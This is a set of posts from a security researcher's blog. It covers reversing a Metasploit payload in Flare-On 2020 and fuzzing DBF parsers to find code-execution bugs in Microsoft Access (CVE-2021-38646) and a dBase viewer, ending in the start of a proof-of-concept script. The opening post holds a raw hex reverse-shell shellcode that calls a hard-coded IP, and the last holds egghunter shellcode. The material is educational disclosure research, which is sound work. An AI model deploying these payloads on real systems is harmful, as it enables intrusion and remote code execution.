Normal view

There are new articles available, click to refresh the page.
Before yesterdayspaceraccoon.dev

Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)

25 October 2021 at 08:03
Rr(J1a|, RWRJLxHQY I:I41 8u};}$uXX$fKXD$$[[aYZQ__Z]h32hws2_ThLw)TPh)kPPPP@P@PhjhDh\jVWhtatNuhVjjVWh_6KXORj@hQjhXSSVPjVSWh_)u[Y]UWkillervulture123^1u1u10UEIu_Q FCE8820000006089E531C0648B50308B520C8B52148B72280FB74A2631FFAC3C617C022C20C1CF0D01C7E2F252578B52108B4A3C8B4C1178E34801D1518B592001D38B4918E33A498B348B01D631FFACC1CF0D01C738E075F6037DF83B7D2475E4588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE05F5F5A8B12EB8D5D6833320000687773325F54684C772607FFD5B89001000029C454506829806B00FFD5505050504050405068EA0FDFE0FFD5976A0568C0A84415680200115C89E66A1056576899A57461FFD585C0740CFF4E0875EC68F0B5A256FFD56A006A0456576802D9C85FFFD58B3681F64B584F528D0E6A406800100000516A006858A453E5FFD58D98000100005356506A005653576802D9C85FFFD501C329C675EE5B595D555789DFE8100000006B696C6C657276756C747572653132335E31C0AAFEC075FB81EF0001000031DB021C0789C280E20F021C168A140786141F881407FEC075E831DBFEC0021C078A140786141F88140702141F8A1417305500454975E55FC351

All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021-38646)

22 October 2021 at 11:43

Note: This is a mirror of the Medium blogpost.

Introduction

After discovering relatively straightforward memory corruption vulnerabilities in tiny DBF parsers and Apache OpenOffice, I wanted to cast my net wider. By searching for DBF-related vulnerabilities in Microsoft's desktop database engines, I took one step towards the deep end of the fuzzing pool. I could no longer rely on source code review and dumb fuzzing; this time, I applied black-box coverage-based fuzzing with a dash of reverse engineering. My colleague Hui Yi has written several fantastic articles on fuzzing with WinAFL and DynamoRIO; I hope this article provides a practical application of those techniques to real vulnerabilities.

First, let me give you some context by diving into the history of Windows desktop database drivers.

A Quick History of Windows' Desktop Database Drivers

Following the successful release of Windows 3.0 in 1990, the number of Windows applications grew quickly. Many of these applications needed persistent storage. In those days, computer memory was limited, making it difficult for modern server-based databases like MySQL to operate. As such, the indexed sequential access method (ISAM) was developed. To put it simply, ISAM was a file-based method of database storage that included the dBase database file (DBF) format.

As the number of SQL and ISAM database formats increased, Microsoft sought to create a single, common interface for applications to communicate with these databases. In 1992, it released Open Database Connectivity (ODBC) 1.0 which supported various database formats via additional desktop database drivers. One of these drivers was Microsoft's Joint Engine Technology (Jet) engine consisting of a set of DLLs that added compatibility with different ISAM database formats. For the DBF format, Jet Engine used the Microsoft Jet xBASE ISAM driver (msxbde40.dll).

Desktop Database Drivers Architecture by Microsoft

Jet Engine DLLs

Despite this alphabet soup, both ODBC and Jet engine enjoyed widespread adoption. Many companies also wrote third-party ODBC desktop database drivers for their own proprietary database formats. The inclusion of Jet Engine in Microsoft Access ensured its longevity for more than 30 years, even though it has been largely deprecated by newer technologies such as SQL Server Express. Microsoft Office now uses the Microsoft Office Access Connectivity Engine, a fork of the Jet engine.

To add to the confusion, Microsoft released the Object Linking and Embedding, Database (OLEDB) API in 1996, which acted as a higher-level interface on top of ODBC to access an even greater range of database formats such as object databases and spreadsheets. On top of that, Microsoft released ActiveX Data Objects, an additional API to access OLEDB. Jason Roff attempted to clarify this in the following diagram:

ActiveX Database Objects

However, you might notice that the diagram misses out that ODBC can also call on the Jet Engine drivers to access non-SQL-based data sources such as DBF! This just goes to show how convoluted Microsoft's desktop database driver environment has become – even fairly authoritative sources cannot capture the full picture.

Security researchers took advantage of the age and complexity of the OLEDB/ODBC/Jet Engine architecture to discover countless memory corruption vulnerabilities. What made it more attractive was that many important Microsoft applications such as Microsoft Office and IIS rely on this stack. The most recent publication on this topic, “Give Me a SQL Injection, I Shall PWN IIS and SQL Server” presented by Palo Alto researchers at Black Hat Asia 2021, detailed many of these dependencies. In fact, the patchwork architecture was so complex that when Microsoft attempted to deprecate OLEDB in 2011, the number of breakages it caused forced Microsoft to reverse the decision six years later.

Given this context, the Jet Engine was my first port of call for hunting vulnerabilities via the DBF format.

Fuzzing Jet Engine with DBF

If you have read part one of the series, you should have a pretty good understanding of format-based dumb fuzzing. While this might be a cost-effective way of fuzzing simple targets, modern approaches apply coverage-based fuzzing. In short, these fuzzers rely on compile- or run-time instrumentation to determine which code paths have been reached in each fuzzing iteration. Based on this information, the fuzzer tries to reach as many code paths as possible to ensure proper coverage of the target. For example, let's take a simple pseudocode function:

function fuzzMe(inputFile){
    if (readLine(inputFile)[0] === opcode1) {
        runOpCode1(inputFile[1:]);
    } else if (readLine(inputFile)[0] === opcode2) {
        runOpCode2(inputFile[1:]);
    } else {
        die();
    }
}

If the fuzzer mutated the input file to match the first condition, it would know that it had reached a new code path to fuzz further. It would save that mutation (first byte matching opCode1) and continue to mutate on top of that saved mutation. This would ensure that rather than wasting time on the fall-through condition (else { die(); }), the fuzzer was reaching deeper into possibly vulnerable code in runOpCode1. This approach is incredibly powerful and most modern fuzzers are coverage-guided, including my fuzzer of choice WinAFL by Google Project Zero.

Since instrumentation is a computationally expensive operation, coverage-based fuzzers should run on a harness. Imagine a large office application that loads a xyzFormat module and runs the xyzFormat.openXyz function whenever it opens an XYZ file. We could fuzz this by using the large office application to open mutated XYZ files repeatedly, but this would be extremely time- and resource-intensive with coverage-guidance instrumentation. Instead, why not write our own mini-program, or harness, to import the xyzFormat module and run the xyzFormat.openXyz function directly? This would involve reverse-engineering the function call and feeding the right inputs, but greatly speed up fuzzing. There's a lot more to discuss here, but if you want a quick guide on coverage-based fuzzing with WinAFL, check out Hui Yi's blogpost.

As I mentioned, fuzzing Jet Engine was a well-travelled path. After consulting the Palo Alto researchers, I decided to build a harness based on the Microsoft OLE DB Provider for Microsoft Jet. The researchers noted that opening the mutated files and executing a few simple queries were sufficient for a successful harness. Hence, I used the CDataSource and CCommand classes as described in Microsoft's OLEDB programming documentation to open the mutated file (CDataSource.OpenFromInitializationString/CSession.Open), execute a select all query (CCommand.Open), retrieve the column information (CCommand.GetColumnInfo), and finally iterate through the row data (CCommand.GetString). In turn, these OLEDB functions depended on the Microsoft Jet OLEDB provider (msjetoledb40.dll) which used Jet Engine (msjet40.dll).

Here, I hit a roadblock. Even though I could fuzz Jet Engine via OLEDB using the Microsoft.Jet.OLEDB.4.0 connection string, I faced many difficulties setting up Jet Engine on my fuzzing environment. Jet Engine was deprecated and did not interact well with my updated environment. After a bit of tinkering, I decided to switch targets and fuzz the Microsoft Access database engine (acecore.dll) via the Microsoft Access OLEDB Provider (aceoledb.dll) instead. To parse a DBF file, the Access database engine would call on its own xBASE ISAM (acexbe.dll). Since my ultimate target was Microsoft Office, it made sense to fuzz the Access Database Engine instead of Jet Engine. Furthermore, since DBF support was removed, then added back to Access in 2016, there was a chance that some interesting code could have been included. Thus, I switched to the Microsoft.ACE.OLEDB.12.0 connection string.

Next, I minimised the DBF sample corpus with winafl-cmin.py, which selected the smallest set with the greatest possible coverage. Finally, I could start my fuzzer! Or rather, my fuzzers – I ran twelve instances simultaneously thanks to WinAFL's parallel fuzzing support.

The Mystery of the Ghost Crashes

As the fuzzers worked in the background, I continued researching other office applications that parsed DBF files. No crashes occurred immediately, but I figured that this was normal since my fuzzing machine was rather slow. This continued for several days, until I checked one morning and found a bunch of crashes!

WinAFL Fuzzing

WinAFL saved the mutated file that caused each crash in the crashes folder with the error in the filename, such as EXCEPTION_ACCESS_VIOLATION.

WinAFL Crashes

To reproduce the vulnerability, I downloaded the crashing files to a virtual machine with the same OLEDB and Microsoft Access database engine environment, then opened the files with the harness. However, the crash no longer occurred! Even when I inspected the harness execution with WinDBG, nothing stood out; the harness opened and parsed the mutated DBF file without any issues.

What was going on?

I went back to the fuzzing machine and ran the harness with the crashing files. No error.

After much head scratching, I attribute it to a false positive and returned to researching other office applications while the fuzzers continued to run. Meanwhile, the crashes stopped occurring.

A few hours later, the same thing happened! Confused, I checked the files on my fuzzing machine; this time, they managed to crash the harness.

I began to put two and two together. There had to be some difference between the fuzzing machine and the debugging machine that caused the discrepancy. After a few hours of painstaking debugging, I made a discovery: one of the office applications I had installed on my fuzzing machine as part of my research appeared to be causing the crashes.

When I uninstalled the office application (which will remain unnamed), the crashes stopped. When I re-installed it, the mutated files crashed the harness again.

Digging deeper, I ran a stack trace on the crash:

0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00f7e360 10e57fc8 IDAPI32!ImltCreateTable2+0x3c6b
01 00f7e38c 67940c19 IDAPI32!DbiOpenTableList+0x31
02 00f7e888 67947046 ACEXBE+0x10c19
03 00f7f110 6794a520 ACEXBE+0x17046
04 00f7f140 6794a295 ACEXBE+0x1a520
05 00f7f15c 5daf71ae ACEXBE+0x1a295
06 00f7f184 5db421cb ACECORE+0x171ae
07 00f7f2c8 5db22f1e ACECORE+0x621cb
08 00f7f360 5db224fe ACECORE+0x42f1e
09 00f7f51c 5db21f8d ACECORE+0x424fe
0a 00f7f640 5db20db2 ACECORE+0x41f8d

The crash occurred in IDAPI32, which was called by ACEXBE (remember that this is the Microsoft Access xBASE ISAM). Where had this come from? A quick Google for “IDAPI32” revealed that this library was the “Borland Database Engine library”. Huh? Puzzled, I checked the path to the library: c:\Program Files\Common Files\Borland Shared\BDE\IDAPI32.DLL.

Then, it clicked. The unnamed office application had installed the Borland Database Engine (BDE) as a dependency. Somehow, once this was installed, the Microsoft Access database engine xBASE ISAM switched to BDE to parse the DBF files. How did this happen?

Looking through the disassembled code of ACEXBE in IDA Pro, I discovered where it loaded IDAPI32:

.text:1000E1B3 sub_1000E1B3    proc near               ; CODE XREF: sub_1000F82F:loc_1000F9DD↓p
.text:1000E1B3
.text:1000E1B3 Type            = dword ptr -428h
.text:1000E1B3 cbData          = dword ptr -424h
.text:1000E1B3 phkResult       = dword ptr -420h
.text:1000E1B3 Destination     = word ptr -41Ch
.text:1000E1B3 Data            = word ptr -210h
.text:1000E1B3 var_4           = dword ptr -4
.text:1000E1B3
.text:1000E1B3                 push    ebp
.text:1000E1B4                 mov     ebp, esp
.text:1000E1B6                 sub     esp, 428h
.text:1000E1BC                 mov     eax, ds:dword_10037408
.text:1000E1C1                 xor     eax, ebp
.text:1000E1C3                 mov     [ebp+var_4], eax
.text:1000E1C6                 push    edi
.text:1000E1C7                 lea     eax, [ebp+phkResult]
.text:1000E1CD                 push    eax             ; phkResult
.text:1000E1CE                 push    20019h          ; samDesired
.text:1000E1D3                 push    0               ; ulOptions
.text:1000E1D5                 push    offset SubKey   ; "Software\\Borland\\Database Engine"
.text:1000E1DA                 push    80000002h       ; hKey
.text:1000E1DF                 call    ds:RegOpenKeyExW
.text:1000E1E5                 test    eax, eax
.text:1000E1E7                 jz      short loc_1000E1F0
.text:1000E1E9                 xor     eax, eax
.text:1000E1EB                 jmp     loc_1000F54A
...
.text:1000E28E loc_1000E28E:                           ; CODE XREF: sub_1000E1B3+13E↓j
.text:1000E28E                 push    edi             ; SizeInWords
.text:1000E28F                 lea     eax, [ebp+Destination]
.text:1000E295                 push    eax             ; Destination
.text:1000E296                 push    esi             ; Source
.text:1000E297                 call    sub_10007876
.text:1000E29C                 mov     eax, ebx
.text:1000E29E                 sub     eax, esi
.text:1000E2A0                 and     eax, 0FFFFFFFEh
.text:1000E2A3                 cmp     eax, 20Ah
.text:1000E2A8                 jnb     loc_1000F559
.text:1000E2AE                 xor     ecx, ecx
.text:1000E2B0                 mov     [ebp+eax+Destination], cx
.text:1000E2B8                 lea     eax, [ebp+Destination]
.text:1000E2BE                 push    edi
.text:1000E2BF                 push    eax
.text:1000E2C0                 push    offset aIdapi32Dll ; "\\IDAPI32.DLL"
.text:1000E2C5                 call    Mso20Win32Client_1065

It appeared that the Access xBase ISAM included a hard-coded check for the BDE path and would run BDE if it existed! Since BDE was a long-deprecated library, with the last version released in 2001 according to WaybackMachine, this was a classic example of CWE-1104: Use of Unmaintained Third Party Components. There were undoubtedly numerous vulnerabilities left over in this classic piece of software that led to the crashes.

I have explained the technical reason for the crashes. However, to understand how an almost thirty-year-old library ended up in the code of the Microsoft Office Access Database engine, we need to understand the history of the Borland Database Engine.

A Quick History of the Borland Database Engine

In the 1980s, dBase was one of the first tools used by early software developers to build applications. Comprising a database engine and its own programming language, it grew massively due to its first-mover advantage and inspired legions of copycats such as FoxPro. A competing dBase standard called “xBase” was created to distinguish itself from dBase's proprietary technology. Many consumer applications back then were written using dBase tools and its derivatives.

In 1991, then-software giant Borland acquired Ashton-Tate, the owner of dBase. However, competition was heating up with an upstart company named Microsoft, which acquired FoxPro and launched its own Microsoft Access database engine. To shore up its product line-up, Borland also acquired WordPerfect, eventually launching its own Borland Office suite that included DBF compatibility.

Over time, Borland failed to keep up with Microsoft as it was forced to adapt to constant changes in the very platform it was developing for – Windows. Eventually, dBase, WordPerfect, and other core Borland products ended up being sold in pieces to various companies. By 2009, Borland was finished – acquired by Micro Focus for $75 million, a shadow of its former self. It's hard to win a war on your opponent's turf.

However, the deep impact dBase made in early software development continues today. After all, Microsoft Access still includes a legacy xBase ISAM engine. Even the choice of “xBase” instead of “dBase” reflects the cutthroat corporate wars of the past.

Big Database Energy

Back to the Borland Database Engine itself. When I realised the crashes were occurring in the IDAPI32 library, I decided that it would be better to fuzz the IDAPI32 library functions such as DbiOpenTableList and ImltCreateTable2 directly instead of via the high-level OLEDB API. Thankfully, there are still a few tutorials and code snippets online that demonstrate how to call BDE functions to read a DBF file. I had to import several custom structs to support the harness, which ran dbiOpenTable and dbiGetNextRecord to open and parse the database. This removed a lot of the processing overhead of the OLEDB API and allowed me to pinpoint crashes more accurately.

As the crashes stacked up, it was time to triage them. Unlike Peach Fuzzer, WinAFL did not have a convenient triaging helper, but I could easily recreate it using the WinDBG command line interface and PowerShell:

Get-ChildItem "C:\Users\fuzzer\Desktop\crashes" -Filter *.dbf |
Foreach-Object {
      & 'C:\Program Files\Windows Kits\10\Debuggers\x86\windbg.exe' -g -logo C:\Users\fuzzer\Desktop\windbglogs\$_.Name.log -c '.load exploitable;!exploitable;!exchain;q' C:\Users\fuzzer\Desktop\BDEHarness\BDEHarness.exe $_.FullName | Out-Null
}

The script iterated through all the crash files, ran them using the harness in WinDBG, then generated a log file containing the !exploitable output. Next, I focused on the EXPLOITABLE crashes and grouped the ones that had the same crashing instructions.

Right off the bat, two crashes stood out to me.

The Second Order EIP Overwrite

The first crash looked like this:

0:000> r
eax=29ae1de1 ebx=00000000 ecx=1c3be2dc edx=015531a0 esi=1c3bfa4c edi=01553c1c
eip=1bd2f8cd esp=01552e54 ebp=01553808 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
IDAPI32!ImltCreateTable2+0x3c6b:
1bd2f8cd ff10            call    dword ptr [eax]      ds:0023:29ae1de1=????????

This was extremely promising because it looked like I had overwritten the EAX register, which was then used in a call instruction. This meant that I could control the execution flow by changing which address the program would jump to. Just like in my dumb fuzzing workflow, I created a “minimal viable crash” to pinpoint the source of the overwritten EAX bytes.

However, even after minimising the file to the essential few bytes, I realised that none of the bytes in my mutated file matched the overwritten EAX! This was strange, so I searched the application memory for 29ae1de1 to trace back to its source. I realised that these bytes appeared to be coming from the same region of memory but varied based on the value of lengthOfEachRecord in my file.

If you recall from part one, the format of the DBF header looks like this:

struct DBF {
	struct HEADER {
		char version;
		struct DATE_OF_LAST_UPDATE {
			char yy <read=yearFrom1900,format=decimal>;
			char mm <format=decimal>;
			char dd <format=decimal>;
		} DateOfLastUpdate;
		ulong	numberOfRecords;
		ushort	lengthOfHeaderStructure;
		ushort	lengthOfEachRecord;
		char	reserved[2];
		char	incompleteTrasaction <format=decimal>;
		char	encryptionFlag <format=decimal>;
		int	freeRecordThread;
		int	reserved1[2];
		char	mdxFlag <format=decimal>;
		char	languageDriver <format=decimal>;
		short	reserved2;
	} header;

Based on the minimal viable crash, the overflow occurred due to an arbitrarily large lengthOfEachRecord, which caused an oversized memcpy later. In turn, the last byte of lengthOfEachRecord changed the address of the value that EAX was later overwritten with.

Here's a helpful graphic to illustrate this point(er).

Second Order Overwrite

However, it appeared that the crash only occurred within a certain range of values of lengthOfEachRecord. By painstakingly incrementing the last byte, I enumerated these values:

lengthOfEachRecord EAX Source Address EAX
08 FE 106649b6 46424400
18 FE 106649c6 41424400
28 FE 106649d6 45534142
38 FE 106649e6 3b003745
48 FE 106649f6 595e1061
58 FE 10664a06 53091061
68 FE 10664a16 00000000
78 FE 10664a26 60981061
88 FE 10664a36 ab391061
98 FE 10664a46 5c450000
A8 FE 10664a56 65b81061
B8 FE 10664a66 a7b40000
C8 FE 10664a76 00000000
D8 FE 10664a86 6f0e1061
E8 FE 10664a96 29ae1061
F8 FE 10664aa6 80781061

To get my desired code execution, I needed to ensure that the pointer overwrite chain ended at attacker-controlled bytes. I checked each of the potential values of EAX for useful addresses. Unfortunately, none of them pointed to attacker-controlled bytes; while some pointed to unoccupied memory addresses, the rest pointed to other sections of unusable code. I tried overflowing into some of these addresses, but the bytes wrapped around in a way that prevented this from happening. Perhaps the area of memory that contained the possible EAX source addresses was written after the initial overflow.

In the end, I gave up this promising lead as it only caused an indirect execution control at best. On to the next.

The Write-What-Where Gadget

The second crash looked like this:

(26ac.26b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000008 edx=00000021 esi=6bde36dc edi=00490000
eip=4de39db2 esp=00b4d31c ebp=00b4d324 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
IDDBAS32!BL_Exit+0x102:
4de39db2 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00b4d324 4de00cd8 IDDBAS32!BL_Exit+0x102
01 00b4d344 4de019f6 IDDBAS32!XDrvInit+0x1fb7c
02 00b4d370 4ddfc2a9 IDDBAS32!XDrvInit+0x2089a
03 00b4d4d0 4ddee2cd IDDBAS32!XDrvInit+0x1b14d
04 00b4d9d0 4dde2758 IDDBAS32!XDrvInit+0xd171
05 00b4da0c 4bdff194 IDDBAS32!XDrvInit+0x15fc
06 00b4dcc0 4bde5019 IDAPI32!ImltCreateTable2+0x3532
07 00b4de18 79587bb3 IDAPI32!DbiOpenTable+0xcd

At first glance, this appeared less promising than the EIP overwrite. The references to [edi] and [esi] suggested that indirect addressing would be necessary, and rep movs seemed like a cumbersome instruction to deal with.

On closer inspection, however, I realised that this was one of the most powerful memory corruption gadgets: a write-what-where. The rep movs instruction copies the bytes at [ESI] to [EDI] ECX times. After creating my minimal viable crash, I found that ESI, EDI, and ECX were all controllable via bytes in the payload file and I could write arbitrary bytes anywhere in memory!

The minimal viable crash also underscored the strength of coverage-guided fuzzing. To reach this crashing instruction, fieldName must be set to \x00 to trigger the buffer overflow by causing a copy of the rest of the payload bytes into a zero-length string buffer. On top of that, two other bytes corresponding to the languageDriver byte in the header and an offset in the body had to be set to specific values to reach the crash. This was a hallmark of coverage-guided fuzzing: discovering and eventually crashing edge-case conditions in a complex codebase.

Now that I could write arbitrary bytes to memory, the next step was to execute my own code. Thankfully, given the age of the IDDBAS32 library, it was compiled without any memory protections like Data Execution Prevention (DEP) or Address Space Layout Randomisation (ASLR). As such, I could build a straightforward Return-Oriented Programming (ROP) chain exploit that overwrote a fixed return pointer after the malicious overwrite, then worked its way through GetModuleHandleA > GetProcAddress > WinExec.

With the new payload, my harness executed the overwrite and popped Calc.exe without a hitch. Filled with excitement, I opened Microsoft Office Access and added the payload as an external database. It crashed... with no Calculator. What happened?

As it turned out, even though IDDBAS32 was compiled without memory protections, Microsoft Office has enabled Forced ASLR since 2013, which adds address randomisation to loaded libraries even if they were not compiled with it. This stumped quite a few adversaries in the past, such as this CVE-2017-11826 exploit sample analysed by McAfee researchers. In my case, since the addresses of IDDBAS32 were randomised, my exploit was sending the instruction pointer to random addresses instead of the start of my ROP chain.

In such cases where you can no longer rely on non-ASLR modules, the only option is to leak addresses through a memory read gadget. This is much easier to do in a scripting context like JavaScript for a browser exploit. You can run the memory address leak exploit first before your memory write exploit. When opening a database or document in Microsoft Office, however, your options become a lot more limited unless you rely on macros, which is not the ideal exploit scenario. Fortunately, CVE-2021-40444 also highlighted another scripting environment in Office: ActiveX. As another researcher noted on Twitter, this creates another path to bypass ASLR by loading stripped DLLs.

Regardless of your choice of ASLR bypass, once the addresses are correctly aligned, the exploit runs on Access smoothly:

POC

With the exploit completed, I reported the vulnerability at the Microsoft Security Response Centre.

  • 25 June: Initial disclosure
  • 7 July: Case opened
  • 16 July: Vulnerability confirmed
  • 14 September: Fix released (Patch Tuesday)
  • 18 September: Public Disclosure

Conclusion

The dBase vulnerability was an accidental find that surfaced from the depths of computing history. (Un)surpisingly, a thirty-year-old format continues to cause problems in modern applications. Even though the Borland Database Engine was deprecated decades ago, some software manufacturers continue to package it as a dependency, exposing users to old vulnerabilities. The engine is no longer updated and should not be used in software.

For me, it was a useful opportunity to take one step beyond foundational memory corruption skills by exploiting a write-what-where gadget to achieve code execution. It also demonstrated the power of black-box coverage-guided fuzzing in a vulnerability research workflow. I hope this sharing proves useful for other beginners.

All Your (d)Base Are Belong To Us, Part 1: Code Execution in Apache OpenOffice (CVE-2021-33035)

29 September 2021 at 03:35

Note: This is a mirror of the Medium blogpost.

Introduction

Venturing out into the wilderness of vulnerability research can be a daunting task. Coming from a background in primarily web and application security, I had to shift my hacking mindset towards memory corruption vulnerabilities and local attack vectors. This two-part series will share how I got started in vulnerability research by discovering and exploiting code execution zero-days in office applications used by hundreds of millions of people. I will outline my approach to getting started in vulnerability research including dumb fuzzing, coverage-guided fuzzing, reverse engineering, and source code review. I will also discuss some management aspects of vulnerability research such as CVE assignment and responsible disclosure.

In part two, I will disclose additional vulnerabilities that I discovered via coverage-guided fuzzing – including CVE-2021-38646: Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability.

Picking a Target

One piece of advice I received early in the vulnerability research journey was to focus on a file format, not a specific piece of software. There are two main advantages to this approach. Firstly, as a beginner, I lacked the experience to quickly identify unique attack vectors in individual applications, whereas file format parsing tends to be a common entrypoint among many applications. Furthermore, common file formats are well-documented by Request for Comments (RFCs) or open-source code, reducing the amount of effort required to reverse-engineer the format. Lastly, file format fuzzing tends to be much simpler to set up than protocol fuzzing. Overall, it is a good way to get started in vulnerability research.

However, not all file formats are created equal. I needed to select a file format that was not simply a ZIP file in disguise, (e.g. a DOCX file). This helped to simplify my fuzzing templates rather than dealing with nested file containers and reduced the amount of complexity when conducting root cause analysis. As far as possible, I also wanted to focus on a less-researched file format that may have escaped the notice of other researchers.

After a bit of Googling, I found the dBase database file (DBF) format (.dbf).

Created almost 40 years ago, the dBase database format was used as a data storage mechanism for a variety of applications, from spreadsheet processors to integrated development environments (IDEs). Although it continued to support more use cases with each revision, the format still suffered from significant limitations in storage and media support, eventually losing out to more advanced competitors. However, due to its status as a legacy file format across multiple platforms, dBase databases still popped up in interesting places, such as in the shapefile geographic information system (GIS) format. Many spreadsheet and office applications have continued to support DBF, including Microsoft Office, LibreOffice, and Apache OpenOffice.

Fortunately, it was relatively simple to discover the file format documentation for dBase; Wikipedia has a simple description of version 5 of the format and dBase LLC also provides an updated specification. The Library of Congress lists an amazing catalogue of file formats, including DBF. The various versions and extensions of the DBF format provide ample opportunities for programmers to introduce parsing vulnerabilities.

Dumb Fuzzing with GitLab's Peach Fuzzer

Before diving into coverage-guided fuzzing (which I will write about in part 2), I decided to validate my understanding of the file format by using a format-based dumb fuzzer to discover vulnerabilities in simple DBF processors. FileInfo.com provided a list of programs that could open DBF files. I focused on tiny applications whose sole job was to open and display DBF files rather than complex enterprise applications. This had a few advantages. Firstly, it would be much faster to fuzz with dumb fuzzers, which run the entire application rather than a minimal harness. Secondly, there was a greater likelihood that these less well-maintained applications would be vulnerable to format-based exploits. Lastly, this allowed me to isolate any crashes to the file format parsing logic itself. For my research, I fuzzed Windows applications due to the relative abundance of Windows DBF processors.

I used GitLab's open-source Peach Fuzzer – something I previously wrote about – as my dumb fuzzer. Peach Fuzzer claims to be “smart” due to the way it records and analyses crashes as they occur. However, compared to modern coverage-based fuzzers that trace the execution flow with each iteration, Peach Fuzzer only instruments execution (via Intel PIN) in its corpus minimisation tool. During the actual fuzzing itself, Peach mutates test cases based on a given template, also known as “Pits”.

Crafting the Peach Pit for the DBF format proved to be the most difficult and time-consuming stage of dumb fuzzing. The DBF format consists of two main sections: the header and the body. The header includes a prefix that describes the dBase database version, the last update timestamp, and other metadata. More importantly, it specifies the length of each record in the database, the length of the header structure, the number of records, and the data fields in a record. The fields themselves can be integers, strings, floating numbers, or any other supported data types. The fields also include a FieldLength descriptor. The body simply contains all the records as described by the header.

To describe the relationship between the number of records specified in the header and the number of actual records in the body, I used the Relation block. For example, I specified the NumberOfRecords header bytes as such:

<Number name="NumberOfRecords" size="32" signed="false">
    <Relation type="count" of="Records" />
</Number>

Later in the template, I added a <Block name="Records" minOccurs="0"> block in the body. Peach automatically detected this relation and ensured that in subsequent mutations, the number of Records blocks in the fuzzing candidate matched the NumberOfRecords byte in the header (unless the mutation is intended).

One consideration I struggled with was how strict the templates should be. For example, since Peach supports various data types such as String and Number, I could have also specified that the record data in the body should correspond to the FieldType descriptions in the header. However, this might have prevented the fuzzer from discovering interesting new crashes, such as if a String type was provided for an Integer field. Ultimately, I decided to keep this flexible with a generic <Blob name="RecordData" /> block.

With my Peach Pit complete, it was time to gather a corpus of samples to generate new fuzzing candidates. I wrote a simple Python script to scrape samples using the filetype:dbf Google dork, triaged the samples, and then minimised the corpus with Peach's own tool:.\PeachMinset.exe -s samples -m minset -t traces "<PATH TO FUZZING TARGET>" %s. This cut the corpus size down from more than 200 to about 20.

After all that work, I could finally begin fuzzing! This was as simple as Z:\peach\Peach.exe .\dbf_pit.xml. Some of the applications held up well; for others, the crashes piled up quickly.

Peach Crashes

Peach Fuzzer runs WinDBG's !exploitable script on crashes to triage them. Here, we see that Scalabium dBase Viewer suffered from a structured exception handler (SEH) overwrite crash from one of the test cases.

SEH Crash

Since SEH overwrites are one of the easiest to exploit in Windows (if there are no pesky protections in the way), Peach rightly categorised it as EXPLOITABLE. Additionally, Peach listed which fields it mutated for this test case.

The next step was to pinpoint exactly which bytes caused the SEH overwrite in the test case. I opened the test case in 010 Editor with a DBF template that highlighted which bytes corresponded to the format's specification and manually whittled away excess bytes until I had a “minimal viable crash” file that reproduced the same crash.

Minimal Viable Crash

On the left, you can see the original crash was 18538 bytes, while on the right the minimal viable crash file was only 102 bytes. By removing excess bytes in blocks while ensuring that the crash was still reproducible, I eventually isolated the root cause of the crash: the field with fieldType of 2!

Going back to the DBF documentation, the fieldType byte defines the data type of the corresponding field in the record, such as C for character, D for date, l for long, and so on. However, 2 was not mentioned. After further research, I came across the documentation for the FlagShip extension to the dBase database format that included a 2 data type:

fieldType Size Type Description/Storage Applies for (supported by)
2 2 short int binary int max +/– 32767 FS (.dbf type = 0x23,0x33,0xB3)
4 4 long int binary int max +/– 2147483647 FS (.dbf type = 0x23,0x33,0xB3)
8 8 double binary signed double IEEE FS (.dbf type = 0x23,0x33,0xB3)

This suggested that the overflow occurred due to an overly large buffer being copied into the short int buffer of size 2. I decided to further inspect the crash in WinDBG:

(173c.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe
eax=001979d0 ebx=41414141 ecx=00000000 edx=41414141 esi=00000000 edi=02214628
eip=0046619c esp=00197974 ebp=0019faa4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
dbfview+0x6619c:
0046619c 8b4358          mov     eax,dword ptr [ebx+58h] ds:002b:41414199=????????
0:000> !exchain
0019798c: dbfview+6650f (0046650f)
0019faac: 42424242
Invalid exception stack at 41414141
0:000> dd 0019faac-0x20
0019fa8c  00000000 41414141 41414141 41414141
0019fa9c  41414141 41414141 41414141 41414141
0019faac  41414141 42424242 0019fb40 0019fb48
0019fabc  004676e7 0019fb40 004c1c10 00000002
0019facc  02214628 00000000 02214744 00000000
0019fadc  00000000 0019fb48 004082ef 02214744
0019faec  80000000 00000003 00000000 00000003
0019fafc  00000080 00000000 4c505845 0054494f

I observed that my controlled buffer of size 36 (as specified in fieldLength in the 010 Editor template) had been copied byte for byte into the short int buffer which led to the SEH overwrite. This suggested that the application blindly trusted the attacker-controlled fieldLength when performing a copy of the bytes into a pre-allocated buffer whose size was determined by the attacker-controlled fieldType. This resulted in a straightforward buffer overflow with no special character requirements. Before proceeding with the exploitation, I performed one final check with narly for any memory protections:

0:000> !nmod
00400000 0051e000 dbfview              /SafeSEH OFF                C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe

Great, dbfview had no protections. I proceeded to write a short script to generate my proof-of-concept payload.

from struct import pack

# SEH-based egghunter with egg w00tw00t
egghunter = b"\xeb\x2a\x59\xb8\x77\x30\x30\x74\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"                       

# dbase header
